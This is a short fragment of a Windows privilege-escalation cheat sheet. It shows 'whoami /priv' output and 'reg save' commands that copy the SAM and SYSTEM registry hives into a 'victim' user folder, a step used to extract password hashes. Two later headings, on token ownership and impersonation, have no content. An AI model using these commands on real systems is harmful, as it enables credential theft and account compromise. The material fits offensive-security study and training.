Abusing dangerous privileges
SeBackup / SeRestore
C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeBackupPrivilege Back up files and directories Disabled SeRestorePrivilege Restore files and directories Disabled SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set DisabledC:\> reg save hklm\system C:\Users\victim\system.hive
The operation completed successfully.
C:\> reg save hklm\sam C:\Users\victim\sam.hive
The operation completed successfully.SeTakeOwnership



SeImpersonate / SeAssignPrimaryToken


Last updated
